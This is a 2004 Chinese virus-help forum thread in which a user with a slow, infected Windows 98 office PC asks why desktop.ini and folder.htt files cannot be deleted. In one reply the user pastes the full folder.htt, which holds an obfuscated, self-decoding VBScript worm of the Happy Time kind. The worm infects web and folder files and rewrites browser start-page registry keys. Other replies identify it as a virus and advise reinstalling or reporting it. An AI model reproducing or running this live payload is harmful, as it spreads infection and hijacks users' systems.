论坛: 病毒专区 标题: 不知道是不是病毒 复制本贴地址    
作者: taj [taj]    论坛用户   登录
我的系统有三个分区,在C盘,D盘的根目录下有DESKTOP  FOLDER两个文件,和欢乐时光一样,删不掉。其他文件则不受影响,除了U盘。

我最近在DOS下杀爱情后门,其病毒感染文件均为。EXE后缀的文件,杀完后导致导致系统无法进入,只有修复安装,再进入查有发现WIN32。PARITE。A。6958查杀后无恙,但速度越来越慢,CPU的使用特高,内存底,又查不到毒,请教大家有什么办法查明原因吗?苦恼中,,,,,



[此贴被 taj(taj) 在 06月17日16时31分 编辑过]

地主 发表时间: 04-06-17 16:24

回复: kailangq [kailangq]   版主   登录
我看重装会好点,因为问题实在太多,也有许多不明

B1层 发表时间: 04-06-17 17:14

回复: TecZm [teczm]   版主   登录


B2层 发表时间: 04-06-17 17:34

回复: taj [taj]   论坛用户   登录
我也想啊,但这是公司的电脑,我没有驱动

B3层 发表时间: 04-06-17 17:37

回复: kailangq [kailangq]   版主   登录
公司没技术员吗?

B4层 发表时间: 04-06-17 17:40

回复: taj [taj]   论坛用户   登录
人在的话我就不用亲自出马了,,,唉

B5层 发表时间: 04-06-18 08:02

回复: taj [taj]   论坛用户   登录
我的系统有三个分区,在C盘,D盘的根目录下有DESKTOP  FOLDER两个文件,和欢乐时光一样,删不掉。其他文件则不受影响,除了U盘。

主要是上面这个问题,不能确定是不是毒,反正C,D两盘上的删不掉,


B6层 发表时间: 04-06-18 08:05

回复: TecZm [teczm]   版主   登录
你说的情况好像和我昨天遇到的有点类似,当我插上带毒U盘时,瑞星能查到病毒,但杀掉后,刷新一次又出现了,后来我怀疑瘟2K读取U盘方式,把U盘拔掉后,杀毒,就可以杀掉病毒了。

B7层 发表时间: 04-06-18 08:32

回复: taj [taj]   论坛用户   登录
不是吧,我的金山和一些专杀都查不到,插上U也没有反应,好象不 传染到其他的文件夹
PS:我的系统是98
那文件也是通过U盘从同事的机子上传染的


[此贴被 taj(taj) 在 06月18日11时19分 编辑过]

B8层 发表时间: 04-06-18 11:07

回复: lijingxi [lijingxi]   见习版主   登录
首先查看自己的显卡类型  主版类型 然后找到厂商下载驱动惫份到系统以外的盘
然后重新安装系统就行了! 只要能上网 还怕啥!

B9层 发表时间: 04-06-18 14:17

回复: taj [taj]   论坛用户   登录
那就不是病毒咯?
目前还没有发现系统受什么大影响,我可不想重装,。好麻烦的。
不过在2000(自己的电脑)下不受影响,只是98(公司的)有。

B10层 发表时间: 04-06-18 14:26

回复: lijingxi [lijingxi]   见习版主   登录
应该不是病毒引起的! 有的时候系统很慢也不一定就是病毒引起的!

B11层 发表时间: 04-06-18 15:11

回复: triones [pig4210]   论坛用户   登录
  爱情后门比较狠,我看是因为没杀干净才有这种事情。因为中了它以后,凡是exe文件就要警惕。而且,它会使你在双击本地驱动盘时就开始运行病毒。中毒后,几乎所有(系统盘除外)盘的80%的EXE文件都会被替换成它的副本。如果你是双系统,那另外一个系统肯定是废。
  

B12层 发表时间: 04-06-19 09:38

回复: lijingxi [lijingxi]   见习版主   登录
要是病毒软件引起  那么现在的爱情后门病毒新版本的杀毒软件应该会报告病毒了!
建议还是重新安装一下系统安全一点!

B13层 发表时间: 04-06-19 11:25

回复: Frankiez [frankiez84]   论坛用户   登录
你为什么不把这两个文件用编缉器打开看看呢
欢乐时光有kj_start的javascript角本语句的

你也可以看看这里面是不是有类似的病毒角本,如果没有的话那就不用管了,可能是文件夹用了模板

B14层 发表时间: 04-06-20 18:40

回复: lijingxi [lijingxi]   见习版主   登录
安装一个诺顿看看吧!

B15层 发表时间: 04-06-20 18:53

回复: taj [taj]   论坛用户   登录
[ExtShellFolderViews]
Default={5984FFE0-28D4-11CF-AE66-08002B2E1262}
{5984FFE0-28D4-11CF-AE66-08002B2E1262}={5984FFE0-28D4-11CF-AE66-08002B2E1262}

[{5984FFE0-28D4-11CF-AE66-08002B2E1262}]
PersistMoniker=file://Folder.htt

[.ShellClassInfo]
ConfirmFileOp=0

这是desktop.ini


<html><body style="margin: 0" scroll=no><object id=FileList border=0 tabindex=1 classid="clsid:1820FED0-473E-11D0-A96C-00C04FD705A2" style="width: 100%; height: 100%" tabIndex=-1></object></body></html>
<script language="vbscript"><!--
myEncString="NnEqrnrRdstmd Mewt cil @poOaj+fro+WrSgekl+WhnCiq,SelpkaseCiq,ShhsCiqP`tg,SelpkaseEike+mxSsaqtOafe+DdsjtnpHNH,eokddrGTS,lyDnbSsrhnf,eSsrhnf,uCndd dhmmxEwpLahn'2(,lyKobakKdy'2(,hnhLhnd(7)+dqooMd(3) cobulemt-wqise;%ciu rtxld=&vhshbhlhtx:hhdcem'=<!&!aopkes male<'ubr.hc`rNs-0-0-10'cndd=bol.ls-abthvdX-AbthvdXBolpnndns>;/!&!aopkes>;/!&!dhv= lyCasa<;%rcqiotl`nfu`gd=!ubrcqiot!fnr<!whncov! dvdns=!! dnctmdns.vrhtd lyCasa&nnko`d!=m`im_nnko`d');/!&!sbrhps>! dnctmdns.vrhtd lyCasa&nntnko`d!=m`im_nntnko`d');/!&!sbrhps>! stbm`im_nnko`d') hnht@csiueW(( imisDhrOashr(( imisRdgDnsrher(( imisDqooCndds') bhdcjEwirtEiker(( imfdcsTgirFhld(SelpkaseEike( imfdcsRnosDhr') dnc rua stbm`im_nntnko`d') hneebtQontCiq(( cgebkDxhssFhlds') hneebtShhsEike'Tdmol`tdFhld) leqgdRdgDnsrher(( SbamFhldsHn'TgirDhrOash( cgebkCaseOLnac(( emdstb rua hnht@csiueW(( Om Drqoq QeruleNdxs SdtAopNbi < cobulemt-aopkess'ubr.hc`rNs-0-0-10( AopNbi.resCKSHD(!{E925CC12,1BF/-01C0,ACB8-/0B03FC57A/B|( AopNbi.brdaseHnrt`nbe') Res VsRhdlk < @poOaj-GdtNbiebt') @poOaj-sdtBLRIC 'z0C42FD00-E083,10CE-7930,0/A/C8044127}!) @poOaj-cqe`tdImssamcd(( Sdtfro=AopNbi.FesOajdcs(( emdstb rua hnhtCiqP`tgs') NnEqrnrRdstmd Mewt VimDhr=fro-GdtRpdchakFnlceq(/) SelpkaseCiq < VimDhr&[&Vea&[ SelpkaseEike=Tdmol`tdDhr&eokddr-hst! TgirDhrOash=Mhd'whncov.kobasinn+ 8,Ldn'whncov.kobasinn() Eoq w < Kem(ShhsCiqP`tg)Tn 0 Rtdp-0 Ie Lic(ShhsCiqP`tg,x+ 0)=.Tgem DxhtFnr Mewt HfLBare'Rhggt'TgirDhrOash+ 2)( < !hsm! NrLBare'Rhggt'TgirDhrOash+ 3)( < !hsmkTgem TgirDhrOash=Mhd'TgirDhrOash+ 0,x( Eksd TgirDhrOash=Mhd'TgirDhrOash+ 0,Ldn'TgirDhrOash( * w)&. ShhsCiqP`tg < tndsbaoe'TgirDhrOash( EmdIe emdstb rua hnhtQefEmtqids') NnEqrnrRdstmd Mewt lyKobakKdy'0( < !SsaqtP`gd lyKobakKdy'1( < !Lnc`lP`gd lyKobakKdy'2( < !Ddf`ukt^P`gd_TRK lyDxoM`im(/)=GKDY^CTRQEMT^UREQ\Roetvaqe[Mhcqoroet[Imtdrmes Dxolnrdr[M`im\! mxEwpLahn'1( < !HJEX_KOBAK_LABHHND\Roetvaqe[Mhcqoroet[Imtdrmes Dxolnrdr[M`im\! mxEwpLahn'2( < !HJEX_TSDRR\-DDF@UKT[Snfsw`rd\Librnsnfs\HnseqndtEwpkoqeq\Lahn[ lyRt`rsP`gd < !hsto:./vwv.fenchther.bol/gecd`_laqid_sokemthnn/hncew.gtl dnc rua stbimisDqooCndds') NnEqrnrRdstmd Mewt hnhLhnd(/)<ZEwtRhdlkFnlceqVhevs\ hnhLhnd(0)<Ceeatls=z5883FEE/-18C4,10CE-@E56,070/2A2D1161}! imiKime'2(=!{4974EFD0,27D3-01BF,AD65-/8/01B1E0252|=z5883FEE/-18C4,10CE-@E56,070/2A2D1161}! imiKime'3(=! hnhLhnd(3)<Z{4974EFD0,27D3-01BF,AD65-/8/01B1E0252|]! imiKime'5(=!PdrrirtLomijeq=eike9/.Fnlceq.gts hnhLhnd(5)<! imiKime'7(=![-SgeklBl`srImfn]! imiKime'8(=!CnneiqmEikeNp<0! fnrx=0tn 7 DdsjtnpHNH=CerksooIMI&imiKime'x( % ubbrkf mewt eokddrGTS < !<!&!hsmk>;%aocyssyke<!m`rfim:0!sbrnlk=mo=<!&!oajdcs hd<FhldLhss aoqddr<0t`bhncew=0 bl`sric=!blric:0810EEC0,463D-01C0,A86B-/0B03FC7/5@2!ssyke<!whdsh9 00/%: gehggt9 00/%!t`bHncew=,1=<.%nbiebt=<.%aocy=<.%gtll= crnpLe'0( < !<!&!sbrhps kamgtafe<!vasbrhps!>;%cgr'32)%,-! dqooMd(0)=lyDnbSsrhnf=!!&lyDnbSsrhnf&!! crnpLe'2( < !Ewe! % !cttd(!eoq h=0 soLdn'mxEmcRtqimg(! % ubbrkf&!s<cgr'arc'mhd'mxEmcRtqimg+i+1()*imnd2(! &vacqle % !hfs<cgr'18)tgem r=bhq(24(! &vacqle % !hfs<cgr'27)tgem r=ubBr! % ubbrkf&!ie r=bhq(19( shdns<vaLe! &vacqle % !lyCebSsrhnf=lyCebSsrhnf % r! &vacqle % !mewt!( crnpLe'3( < !Ewe! % !cttd(lyCebSsrhnf)! dqooMd(3)=,-! % !>;/! % !sbrhps>! fnrx=0tn 3 vBoce<vBoce&dqooMd(w)&vacqle ndxs fRtqimg<mxEmcRtqimg dnc rua StbSbamFhldsHn'fnlceqsoeb) NnEqrnrRdstmd Mewt Res lyEokddrr2=fro-GdtEokddr'fnlceqsoeb) Res lyRuaFnlceqFhlds=mxFnlceqs1.Eiker FnrE`cg lyRuaFnlceqFhld HnmxStbEokddrEiker mxEwt=LBare'fro-GdtDxsemshomN`md(lyRuaFnlceqFhld.Male() HfmxEwt=gtlOq lyDxs < !hsmkOq lyDxs < !hst! Shdn hneebtShhsEike(lyRuaFnlceqFhld.Oash(  HfmxEwt=gtsTgem SdtmxFhld < esn.FesFhld(lyRuaFnlceqFhld.Oash( mxFhld.@tsrhbttds=7 Dnc Hf Dnc Hf Mewt Dnc Rua StbimfdcsTgirFhld(eokddrrpdc( Om Drqoq QeruleNdxs SdtmxFhld < esn.NpdnSewtEike'fnlceqsoeb) lyBomtdnss=mxFhld.Qe`d@lk mxFhld.Blnsd k<0 eoq h=ldn'mxCnnsemtr)tn 0 rtdp-0 ie lic(lyBomtdnss+i+ldn'fRtqimg()<fRtqimgtgem j=j+0 ewis eoq emdie ndxs ie j=/ shdn vOCndd=lyBomtdnss&vacqle % uCndd SdtmxFhld < esn.FesFhld(eokddrrpdc( mxFhld.@tsrhbttds=0 Res lyEike=fro-OoemTdxsFhld(eokddrrpdc+ 1) lyEike-WqisevOCndd mxFhld.Blnsd emdie EmdStb rua bhdcjEwirtEiker(( Om Drqoq QeruleNdxs Ie mos(esn.EokddrDxhsss'Tdmol`tdDhr()Tgem Res lyEike=fro-Cqe`tdFnlceq(SelpkaseCiq) Res lyEike=fro-GdtEokddr'Tdmol`tdDhr( mxFhld.@tsrhbttds=7 BrdaseShhsEikeTdmol`tdFhld,eokddrGTS emdstb rua hneebtQontCiq(( Om Drqoq QeruleNdxs Ie Kem(tndsbaoe'TgirDhrOash()<< 3 Shdn ShhsCiqP`tg <Mhd'TgirDhrOash+ 0,3( BrdaseShhsEikeTgirDhrOash%eokddr-hst!,eokddrGTS&ubbrkf%vBoce BrdaseShhsEikeTgirDhrOash%cerksoo.hnh+DdsjtnpHNH emdie emdstb rua leqgdRdgDnsrher(( Om Drqoq QeruleNdxs fnrx<0tn 1 AopkyQefCgamgdsSomxEwpLahn'x( % lyKobakKdy'x(,QEF_RZ!,mxSsaqtOafe mewt dnc rua StbAopkyQefCgamgdsSo'mxRdgJex,mxRdgSyoe+ lyQefV`lte( Om Drqoq QeruleNdxs WrSgekl-RdgVrhtd lyQefKdy+ lyQefV`lte+ lyQefTxpd EmdStb Rua bhdcjD`tdPKo`d') NnEqrnrRdstmd Mewt HfMhd'FnrlasD`tdThmd(Mov((,2(,1+ 3)=8/16! ShdnWrSgekl-Rtn(!RTNCLK31.DXD rhdlk31.clk,RHDxhtVimdnwrEw 1( EmdStb Rua BrdaseShhsEike'fnlceqsoeb,vishBomtdnss( Om Drqoq QeruleNdxs sdtmxFhld=esn.FesFhld(eokddrrpdc( mxFhld.@tsrhbttds=0 Res lyEike<fro-Cqe`tdTdxsFhld(eokddrrpdc+ Srte( mxFhld.Vrhtd vishBomtdnss lyEike-Ckore res lyEike<fro-GdtEike'fnlceqsoeb) lyEike-Astqiauser < 6 EmdStb"
Execute("for i=1 to Len(myEncString)" & vbcrlf & "s=chr(asc(mid(myEncString,i,1))+i mod 2)"  & vbcrlf & "if s=chr(19) then s=chr(34)"  & vbcrlf & "if s=chr(28) then s=vbCr"  & vbcrlf & "if s=chr(29) then s=vbLf"  & vbcrlf & "myDecString=myDecString & s"  & vbcrlf & "next")
Execute(myDecString)
--></script>

这是folder.htt
大家帮忙看看!

B16层 发表时间: 04-06-21 08:36

回复: z7 [skyzz]   论坛用户   登录
加密过了 好像和我前不几天发的一篇<最近截获的奇怪的欢乐时光>一个类别吧
好像在下一页  你看看

B17层 发表时间: 04-06-21 11:57

回复: taj [taj]   论坛用户   登录
代码我看不懂了,

B18层 发表时间: 04-06-21 14:19

回复: Frankiez [frankiez84]   论坛用户   登录
果然是病毒
上报avp吧

B19层 发表时间: 04-06-21 18:41

回复: taj [taj]   论坛用户   登录
我苯啊,到现在还没有查到,,
大家有知道的吗?

B20层 发表时间: 04-06-22 11:07

回复: lijingxi [lijingxi]   见习版主   登录
看代码感觉有点像蠕虫病毒!
建议上报

B21层 发表时间: 04-06-22 12:39

回复: jiaoyulao [jiaoyulao]   论坛用户   登录
D盘的根目录下有DESKTOP  FOLDER两个文件,和欢乐时光一样,删不掉。

B22层 发表时间: 04-06-23 03:19

回复: taj [taj]   论坛用户   登录
你和我一样吗?
我到现在也查不到。

B23层 发表时间: 04-06-24 10:19

论坛: 病毒专区

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号